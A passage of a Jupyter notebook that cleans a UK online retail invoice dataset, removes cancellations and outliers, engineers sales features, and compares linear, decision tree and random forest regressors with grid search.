here."},{"metadata":{"id":"5TDxDE_NgR-_","colab_type":"code","outputId":"175b502c-7ac3-4cea-b30f-fb4e9f7afb1a","colab":{"base_uri":"https://localhost:8080/","height":163},"trusted":true},"cell_type":"code","source":"df.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"lmL-TjEIr8Tz","colab_type":"text"},"cell_type":"markdown","source":"CustomerID has too much null values and this feature cannot predict a lot so we can just drop it. Also it could be reasonable to create another feature \"Amount of orders per customer\", but.... next time ;)"},{"metadata":{"id":"qZHLLtsRqPTA","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df.drop(columns=['CustomerID'])","execution_count":null,"outputs":[]},{"metadata":{"id":"_oFg_pKssgLp","colab_type":"text"},"cell_type":"markdown","source":"Let's check out what kind of nulls we have in Description"},{"metadata":{"id":"rQkkpcUnsqef","colab_type":"code","outputId":"6d5126e2-7b58-459a-a71c-cd1de52f6e10","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df[df['Description'].isnull()].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"RrpxM_SasxCU","colab_type":"text"},"cell_type":"markdown","source":"The data in these rows is pretty strange as UnitPrice is 0, so these orders do not generate any sales. I think, we can impute it with \"UNKNOWN ITEM\" at the moment and deal with those later during the analysis."},{"metadata":{"id":"eIIq-a31t3mm","colab_type":"code","outputId":"b788c188-bb34-47a5-c374-ba05b88fab66","colab":{"base_uri":"https://localhost:8080/","height":145},"trusted":true},"cell_type":"code","source":"df['Description'] = df['Description'].fillna('UNKNOWN ITEM')\ndf.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"B_RRuBfHyzKm","colab_type":"text"},"cell_type":"markdown","source":"## 2.4. Checking out columns separately"},{"metadata":{},"cell_type":"markdown","source":"Also it makes sense to go feature by feature and check what pitfalls we have in our data and also to understand our numbers better. "},{"metadata":{"id":"rGmT3rxntRwp","colab_type":"text"},"cell_type":"markdown","source":"Let's continue checking Description column. Here we can see items that were bought most often. "},{"metadata":{"id":"2zRnyeufgBDa","colab_type":"code","outputId":"48a7535a-7265-4dd3-d53b-11e1f26ff41b","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Here we can see our best selling products, items that appear in orders the most often. Also to make it visually more appealing let's create a bar chart for 15 top items."},{"metadata":{"id":"JuNgVd6PGt7Y","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":585},"outputId":"47fc5972-c3bb-4145-9209-19964ddcc9a2","trusted":true},"cell_type":"code","source":"item_counts = df['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(item_counts.index, item_counts.values, palette=sns.cubehelix_palette(15))\nplt.ylabel(\"Counts\")\nplt.title(\"Which items were bought more often?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"pgxFvFL0xEL4","colab_type":"text"},"cell_type":"markdown","source":"We also notice from above code that valid items are normally uppercased and non-valid or cancelations are in lower case"},{"metadata":{"id":"0RMbj7vsu3kZ","colab_type":"code","outputId":"a79e7b03-11da-4cc8-9601-497123b134b7","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df[~df['Description'].str.isupper()]['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Quick check of the case of letters in Description says that there are some units with lower case letters in their name and also that lower case records are for canceled items. Here we can understand that data management in the store can be improved."},{"metadata":{"id":"YxTPItIwJQTV","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":567},"outputId":"c2caac93-0726-4cb6-faf2-063ff23c612a","trusted":true},"cell_type":"code","source":"lcase_counts = df[~df['Description'].str.isupper()]['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(lcase_counts.index, lcase_counts.values, palette=sns.color_palette(\"hls\", 15))\nplt.ylabel(\"Counts\")\nplt.title(\"Not full upper case items\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"FIdbxmgjxnV9","colab_type":"text"},"cell_type":"markdown","source":"ALso checking out stoke codes, looks like they are deeply correlated with descriptions - which makes perfect sense."},{"metadata":{"id":"Ifuzm9k3wiZC","colab_type":"code","outputId":"69b593a7-0512-43e8-dc00-fe637f110110","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['StockCode'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{"id":"mYNaQ_KmK6YH","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"45b22661-378f-4bbe-b1e1-9f912e240e84","trusted":true},"cell_type":"code","source":"stock_counts = df['StockCode'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(stock_counts.index, stock_counts.values, palette=sns.color_palette(\"GnBu_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which stock codes were used the most?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"CyIqQt3rx3eo","colab_type":"text"},"cell_type":"markdown","source":"Checking out also InvoiceNo feature."},{"metadata":{"id":"-07Q-Xp3xjSU","colab_type":"code","outputId":"9ade42df-5062-40a9-e649-58ccf31e4d77","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['InvoiceNo'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"5aSNIrR4LnuS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"bdbc0532-dd9b-4dc2-f1b2-f77a390e420e","trusted":true},"cell_type":"code","source":"inv_counts = df['InvoiceNo'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(inv_counts.index, inv_counts.values, palette=sns.color_palette(\"BuGn_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which invoices had the most items?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"swUMOF-fx5qy","colab_type":"code","outputId":"6e23df48-7cf8-4a4a-e980-aec224a8a6fb","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['InvoiceNo'].str.startswith('C')].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"hq-lWQhUyQQR","colab_type":"text"},"cell_type":"markdown","source":"Looks like Invoices that start with 'C' are the \"Canceling\"/\"Returning\" invoices. This resolves the mistery with negative quantities. \n\nAlthough, we should've gotten deeper into analysis of those returns, for the sake of simplicity let's just ignore those values for the moment.\n\nWe can actually start a separate project based on that data and predict the returning/cancelling rates for the store."},{"metadata":{"id":"yJI3a_ew1OKp","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df[~df['InvoiceNo'].str.startswith('C')]","execution_count":null,"outputs":[]},{"metadata":{"id":"08Bdxo0m0neI","colab_type":"code","outputId":"05306d9c-e047-4a7f-d722-74adbf3f8195","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"8czolNlTykMw","colab_type":"text"},"cell_type":"markdown","source":"During exploratory data analysis we can go back to the same operations and checks, just to understand how our actions affected the dataset. EDA is the series of repetitive tasks to understand better our data. And here, for example we get back to *.describe()* method to get an overall picture of our data after some manipulations. \n\nWe still see negative quantities and negative prices, let's get into those records.\n\n"},{"metadata":{"id":"A9i_--Qwq7Hm","colab_type":"code","outputId":"34f01616-e351-4299-9063-ee9f37b41dd8","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"# df[df['Quantity'] < 0]\ndf[df['Quantity'] < 0].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"O7rxmQPd13Ob","colab_type":"text"},"cell_type":"markdown","source":"Here we can see that other \"Negative quantities\" appear to be damaged/lost/unknown items. Again, we will just ignore them for the sake of simplicity of analysis for this project."},{"metadata":{"id":"klcGgM0ZroQJ","colab_type":"code","outputId":"16a57920-5ffd-424a-bea0-0f659f54dee9","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['Quantity'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"wkKCHTG82aPC","colab_type":"text"},"cell_type":"markdown","source":"We also see negative UnitPrice, which is not normal as well. Let's check this out."},{"metadata":{"id":"6inbAyKqrLlI","colab_type":"code","outputId":"d9da9005-0fdd-4c93-87b2-9e8ce268e388","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] < 0].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"acGrnc1WrVc7","colab_type":"code","outputId":"b5b15dc6-29e7-4955-c1d7-849cb3e275c2","colab":{"base_uri":"https://localhost:8080/","height":138},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] == -11062.06]","execution_count":null,"outputs":[]},{"metadata":{"id":"0wOWI0WT2k06","colab_type":"text"},"cell_type":"markdown","source":"As there are just two rows, let's ignore them for the moment (description gives us enough warnings, althoug we still need some context to understand it better)"},{"metadata":{"id":"etvXHm7K29rg","colab_type":"code","outputId":"46e242c3-8d06-4499-d366-62d416d17655","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['UnitPrice'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we have finished cleaning our data and removed all suspicious records we can start creating some new features for our model. Let's start with the most obvious one - Sales. We have quantities, we have prices - we can calculate the revenue."},{"metadata":{"id":"S2AxwWDJ3OFO","colab_type":"code","outputId":"f557fb65-da23-482a-8560-231c5710abfd","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df['Sales'] = df['Quantity'] * df['UnitPrice']\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"gYqYN2LszQro","colab_type":"text"},"cell_type":"markdown","source":"# 3. Visual EDA"},{"metadata":{"id":"afZL4I1q6vlo","colab_type":"code","outputId":"eb25f2bd-1466-482f-997a-f2ccfb717fcc","colab":{"base_uri":"https://localhost:8080/","height":406},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(3,6))\nsns.countplot(df[df['Country'] == 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"onb0ByML3dQe","colab_type":"code","outputId":"43bd565a-d12a-4ac6-c198-6043b065bbcc","colab":{"base_uri":"https://localhost:8080/","height":541},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nsns.countplot(df[df['Country'] != 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"K79ODkHYznEr","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":35},"outputId":"7910c5a6-96f0-4d73-b6aa-0580b04163b1","trusted":true},"cell_type":"code","source":"uk_count = df[df['Country'] == 'United Kingdom']['Country'].count()\nall_count = df['Country'].count()\nuk_perc = uk_count/all_count\nprint(str('{0:.2f}%').format(uk_perc*100))","execution_count":null,"outputs":[]},{"metadata":{"id":"zVPKRDC-zWAW","colab_type":"text"},"cell_type":"markdown","source":"From above plots and calculations we can see that vast majority of sales were made in UK and just 8.49% went abroad. We can say our dataset is skewed to the UK side :D."},{"metadata":{"id":"uSCNB39c1p-K","colab_type":"text"},"cell_type":"markdown","source":"## 3.1. Detecting outliers"},{"metadata":{},"cell_type":"markdown","source":"There are few different methods to detect outliers: box plots, using [IQR](https://en.wikipedia.org/wiki/Interquartile_range), scatter plot also works in some cases (and this is one of those). Also, detecting outliers using scatter plot is pretty intuitive. You plot your data and remove data points that visually are definitely out of range. Like in the chart below."},{"metadata":{"id":"n0tRONoX7zV8","colab_type":"code","outputId":"b5956cde-dc7a-452a-d737-252efb18f632","colab":{"base_uri":"https://localhost:8080/","height":389},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"jB9G52F79ryZ","colab_type":"text"},"cell_type":"markdown","source":"Let's remove obvious outliers"},{"metadata":{"id":"WxEj3y-z9zHj","colab_type":"code","outputId":"75121918-2d46-4566-8561-8ad7724ad896","colab":{"base_uri":"https://localhost:8080/","height":438},"trusted":true},"cell_type":"code","source":"df = df[df['Sales'] < 25000]\nplt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"il5rP2rR10ao","colab_type":"text"},"cell_type":"markdown","source":"After removing obvious outliers we still see some values that are out of normal distribution. To understand better the distribution of our data let's check out different percentiles of our numeric features. "},{"metadata":{"id":"Wd6lkccmCXnY","colab_type":"code","outputId":"a7c2a5bf-e30f-4edb-be89-795b2ff1c191","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"df.quantile([0.05, 0.95, 0.98, 0.99, 0.999])","execution_count":null,"outputs":[]},{"metadata":{"id":"e0Xyxllp2ZI2","colab_type":"text"},"cell_type":"markdown","source":"We can see that if we remove top 2% of our data points we will get rid of absolute outliers and will have more balaced dataset."},{"metadata":{"id":"ntKRBQa-MZEt","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":330},"outputId":"9aea8dde-8243-460f-8133-a7d647d90ac5","trusted":true},"cell_type":"code","source":"df_quantile = df[df['Sales'] < 125]\nplt.scatter(x=df_quantile.index, y=df_quantile['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"BZ5zrj1JNaA7","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"e087d72d-ef1a-4694-a0ba-eb7a69506d71","trusted":true},"cell_type":"code","source":"df_quantile.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Looks like our data is almost ready for modelling. We performed a clean up, we removed outliers that were disturbing the balance of our dataset, we removed invalid records - now our data looks much better! and it doesn't lose it's value."},{"metadata":{"id":"PPX6LukY3Cpf","colab_type":"text"},"cell_type":"markdown","source":"## 3.2. Visually checking distribution of numeric features"},{"metadata":{"id":"zj1rJmD1NB8P","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":281},"outputId":"b380c7b0-21e7-45aa-db9c-ddf2beaac225","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 10]['UnitPrice'].values, kde=True, bins=10)","execution_count":null,"outputs":[]},{"metadata":{"id":"iV5Lv1YXUonz","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"96b5b822-dbe0-46ed-d6d3-03cc7165023e","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 5]['UnitPrice'].values, kde=True, bins=10, color='green')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can see that vast majority of items sold in this store has low price range - 0 to 3 pounds. "},{"metadata":{"id":"MadAXAn0TuCZ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"082d181e-a654-4a68-89a3-4dd761891705","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 30]['Quantity'], kde=True, bins=10, color='red')","execution_count":null,"outputs":[]},{"metadata":{"id":"uDPI8FLbUxRl","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"27f01b22-1973-475a-8164-80ce816b8c61","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 15]['Quantity'], kde=True, bins=10, color='orange')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we that people bought normally 1-5 items or 10-12 - maybe there were some kind of offers for sets?"},{"metadata":{"id":"NUSMODaWUXgm","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"a9a22872-3d5a-4e06-b1ee-40a4bab64e24","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 60]['Sales'], kde=True, bins=10, color='purple')","execution_count":null,"outputs":[]},{"metadata":{"id":"271Hrgm-U5FK","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"f133732c-ae41-4ca2-94a1-71677ed5d0e2","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 30]['Sales'], kde=True, bins=10, color='grey')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can understand that majority of sales per order were in range 1-15 pounds each."},{"metadata":{"id":"MNCUZ2DO3mHM","colab_type":"text"},"cell_type":"markdown","source":"## 3.3. Analysing sales over time"},{"metadata":{"id":"KCPCF-ZsDHpL","colab_type":"code","outputId":"b983fc93-0851-4316-e873-164c7679061a","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df_ts = df[['Sales']]\ndf_ts.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see every invoice has it's own timestamp (definitely based on time the order was made). We can resample time data by, for example weeks, and try see if there is any patterns in our sales."},{"metadata":{"id":"k9vEWHcHEaND","colab_type":"code","outputId":"7f692faa-9857-42b7-a41a-5c2d83fefd9d","colab":{"base_uri":"https://localhost:8080/","height":326},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\ndf_resample = df_ts.resample('W').sum()\ndf_resample.plot()","execution_count":null,"outputs":[]},{"metadata":{"id":"zFi5bGs534oQ","colab_type":"text"},"cell_type":"markdown","source":"That week with 0 sales in January looks suspicious, let's check it closer"},{"metadata":{"id":"1QXCBgf8WQUD","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":348},"outputId":"55d754dc-79af-4722-bba6-726d6f7329a0","trusted":true},"cell_type":"code","source":"df_resample['12-2010':'01-2011']","execution_count":null,"outputs":[]},{"metadata":{"id":"U7o8UfRB4GLy","colab_type":"text"},"cell_type":"markdown","source":"Now it makes sense - possibly, during the New Year holidays period the store was closed and didn't process orders, that's why they didn't make any sales."},{"metadata":{"id":"NIpdfJcS4mbx","colab_type":"text"},"cell_type":"markdown","source":"# 4. Preparing data for modeling and feature creation"},{"metadata":{},"cell_type":"markdown","source":"Now it comes the most fun part of the project - building a model. To do this we will need to create few more additional features to make our model more sophisticated."},{"metadata":{"id":"Z26VIUm8VJ0M","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"acaee750-803a-4332-c724-9f2568620b51","trusted":true},"cell_type":"code","source":"df_clean = df[df['UnitPrice'] < 15]\ndf_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"4ddHzAzmkAx9","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":235},"outputId":"8834df7a-f77b-4a7a-a50e-0e26afd503f4","trusted":true},"cell_type":"code","source":"df_clean.index","execution_count":null,"outputs":[]},{"metadata":{"id":"IJST6pYl47s6","colab_type":"text"},"cell_type":"markdown","source":"## 4.1. Quantity per invoice feature"},{"metadata":{},"cell_type":"markdown","source":"A feature that could influence the sales output could be \"Quantity per invoice\". Let's find the data for this feature."},{"metadata":{"id":"XeL8mapkXU3c","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_join = df_clean.groupby('InvoiceNo')[['Quantity']].sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"yB4Fqi0qf-tx","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"8be7a159-28ed-4e2e-8576-76f94311df48","trusted":true},"cell_type":"code","source":"df_join = df_join.reset_index()\ndf_join.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"4q88pvAuX2Rh","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":607},"outputId":"bb6ce533-2ee6-42e2-adaa-ea49e04720ac","trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = df_clean.index\ndf_clean = df_clean.merge(df_join, how='left', on='InvoiceNo')\ndf_clean = df_clean.rename(columns={'Quantity_x' : 'Quantity', 'Quantity_y' : 'QuantityInv'})\ndf_clean.tail(15)","execution_count":null,"outputs":[]},{"metadata":{"id":"FkOT2yPciD0Q","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"c0fbb47b-ff20-4189-8433-14a1a14f6663","trusted":true},"cell_type":"code","source":"df_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"DDzWZ6K_o4z0","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = pd.to_datetime(df_clean['InvoiceDate'])","execution_count":null,"outputs":[]},{"metadata":{"id":"2tQTQyu4pBaf","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":199},"outputId":"11c8b52d-9760-460c-e1e7-749defaf9e4f","trusted":true},"cell_type":"code","source":"df_clean.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"BirwPlbT5SRb","colab_type":"text"},"cell_type":"markdown","source":"## 4.2. Bucketizing Quantity and UnitPrice features"},{"metadata":{"id":"AOfQmYrH5fxk","colab_type":"text"},"cell_type":"markdown","source":"Based on the EDA done previously we can group these features into 6 buckets for Quantity and 5 for UnitePrice using pandas .cut() method."},{"metadata":{"id":"PxLoYdjImDsy","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"9f1e0505-65aa-4ad8-c629-507e7ba6964d","trusted":true},"cell_type":"code","source":"bins_q = pd.IntervalIndex.from_tuples([(0, 2), (2, 5), (5, 8), (8, 11), (11, 14), (15, 5000)])\ndf_clean['QuantityRange'] = pd.cut(df_clean['Quantity'], bins=bins_q)\nbins_p = pd.IntervalIndex.from_tuples([(0, 1), (1, 2), (2, 3), (3, 4), (4, 20)])\ndf_clean['PriceRange'] = pd.cut(df_clean['UnitPrice'], bins=bins_p)\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"v66wi4HE59RQ","colab_type":"text"},"cell_type":"markdown","source":"## 4.3. Extracting and bucketizing dates"},{"metadata":{"id":"FOZtgaSQ6McM","colab_type":"text"},"cell_type":"markdown","source":"We have noticed that depends on a season gifts sell differently: pick of sales is in the Q4, then it drastically drops in Q1 of the next year and continues to grow till its new pick in Q4 again. From this observation we can create another feature that could improve our model."},{"metadata":{"id":"yBChTJkks6Pq","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"9ae44644-c18e-4633-8649-68cb46bad8a7","trusted":true},"cell_type":"code","source":"df_clean['Month'] = df_clean['InvoiceDate'].dt.month\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"jxsN8XZVqmgU","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"b4e4d754-b9b9-4707-8eb1-db31303cf422","trusted":true},"cell_type":"code","source":"bins_d = pd.IntervalIndex.from_tuples([(0,3),(3,6),(6,9),(9,12)])\ndf_clean['DateRange'] = pd.cut(df_clean['Month'], bins=bins_d, labels=['q1','q2','q3','q4'])\ndf_clean.tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"VV_-KJsD8AMi","colab_type":"text"},"cell_type":"markdown","source":"# 5. Building a model"},{"metadata":{"id":"zoj-cC6N6wHN","colab_type":"text"},"cell_type":"markdown","source":"## 5.1. Splitting data into UK and non-UK"},{"metadata":{"id":"LCuO7Bdz64di","colab_type":"text"},"cell_type":"markdown","source":"We have to analyze these 2 datasets separately to have more standardized data for a model, because there can be some patterns that work for other countries and do not for UK or vise versa. Also a hypothesis to test - does the model built for UK performs good on data for other countries? "},{"metadata":{"id":"xmWtfOhCvdft","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_uk = df_clean[df_clean['Country'] == 'United Kingdom']\ndf_abroad = df_clean[df_clean['Country'] != 'United Kingdom']","execution_count":null,"outputs":[]},{"metadata":{"id":"Jr4lhQyFvsH0","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"0af6cb14-195a-460d-bfd8-212a8625520c","trusted":true},"cell_type":"code","source":"df_uk.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"7m7-iaA-8HMk","colab_type":"text"},"cell_type":"markdown","source":"## 5.2. Extracting features and creating dummy variables"},{"metadata":{"id":"0J8hPy4HwW0X","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"b11bc87e-524c-49fe-cdab-c75f697166c1","trusted":true},"cell_type":"code","source":"df_uk_model = df_uk[['Sales', 'QuantityInv', 'QuantityRange', 'PriceRange', 'DateRange']]\ndf_uk_model.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"SZRq6C640Blc","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":215},"outputId":"5cc68aba-1928-4e80-c481-27f4b5434530","trusted":true},"cell_type":"code","source":"df_data = df_uk_model.copy()\ndf_data = pd.get_dummies(df_data, columns=['QuantityRange'], prefix='qr')\ndf_data = pd.get_dummies(df_data, columns=['PriceRange'], prefix='pr')\ndf_data = pd.get_dummies(df_data, columns=['DateRange'], prefix='dr')\ndf_data.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"f-SPb1vS8WJp","colab_type":"text"},"cell_type":"markdown","source":"## 5.3. Scaling"},{"metadata":{},"cell_type":"markdown","source":"As the majority of our features are in 0-1 range it would make sense to scale \"QuantityInv\" feature too. In general, scaling features is normally a good idea."},{"metadata":{"id":"pZknqQll1XwF","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.preprocessing import scale\ndf_data['QuantityInv'] = scale(df_data['QuantityInv'])","execution_count":null,"outputs":[]},{"metadata":{"id":"ubjfXWh18gyd","colab_type":"text"},"cell_type":"markdown","source":"## 5.4. Train-Test Split"},{"metadata":{},"cell_type":"markdown","source":"Now we have to split our data into train-test data to be able to train our model and validate its capabilities."},{"metadata":{"id":"PzvfoUoP1x3_","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"y = df_data['Sales']\nX = df_data.drop(columns=['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"PgddlfS31-EG","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"from sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state=42)","execution_count":null,"outputs":[]},{"metadata":{"id":"PuVn7UAz8vU0","colab_type":"text"},"cell_type":"markdown","source":"## 5.5. Testing and validating different models"},{"metadata":{},"cell_type":"markdown","source":"Here we use GridSearch and CrossValidation to test three types of regressors: Linear, DecisionTree and RandomForest. This can take a while..."},{"metadata":{"id":"5tvAeU4J2NgQ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":674},"outputId":"c2845c6a-69aa-4193-b46c-a7f1439e9c1d","trusted":true},"cell_type":"code","source":"from sklearn.model_selection import KFold\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\n\n# Linear Regression\nfit_intercepts = [True, False]\nparam_grid_linear = dict(fit_intercept=fit_intercepts)\nlinear_model = LinearRegression()\n\n# Decision Tree\nmin_tree_splits = range(2,5)\nmin_tree_leaves = range(1,4)\nparam_grid_tree = dict(min_samples_split=min_tree_splits,\n min_samples_leaf=min_tree_leaves)\ntree_model = DecisionTreeRegressor()\n\n# Random Forest\nestimators_space = [100]\nmin_sample_splits = range(2,4)\nmin_sample_leaves = range(1,3)\nparam_grid_forest = dict(min_samples_split=min_sample_splits,\n min_samples_leaf=min_sample_leaves,\n n_estimators=estimators_space)\nforest_model = RandomForestRegressor()\n\ncv = 5\n\nmodels_to_test = ['LinearRegression','DecisionTreeRegressor','RandomForest']\nregression_dict = dict(LinearRegression=linear_model,\n DecisionTreeRegressor=tree_model,\n RandomForest=forest_model)\nparam_grid_dict = dict(LinearRegression=param_grid_linear,\n DecisionTreeRegressor=param_grid_tree,\n RandomForest=param_grid_forest)\n\nscore_dict = {}\nparams_dict = {}\nmae_dict = {}\nmse_dict = {}\nr2_dict = {}\nbest_est_dict = {}\n\nfor model in models_to_test:\n regressor = GridSearchCV(regression_dict[model], param_grid_dict[model], cv=cv, n_jobs=-1)\n\n regressor.fit(X_train, y_train)\n y_pred = regressor.predict(X_test)\n\n # Print the tuned parameters and score\n print(\" === Start report for regressor {} ===\".format(model))\n score_dict[model] = regressor.best_score_\n print(\"Tuned Parameters: {}\".format(regressor.best_params_)) \n params_dict = regressor.best_params_\n print(\"Best score is {}\".format(regressor.best_score_))\n\n # Compute metrics\n mae_dict[model] = mean_absolute_error(y_test, y_pred)\n print(\"MAE for {}\".format(model))\n print(mean_absolute_error(y_test, y_pred))\n mse_dict[model] = mean_squared_error(y_test, y_pred)\n print(\"MSE for {}\".format(model))\n print(mean_squared_error(y_test, y_pred))\n r2_dict[model] = r2_score(y_test, y_pred)\n print(\"R2 score for {}\".format(model))\n print(r2_score(y_test, y_pred))\n print(\" === End of report for regressor {} === \\n\".format(model))\n \n # Add best estimator to the dict\n best_est_dict[model] = 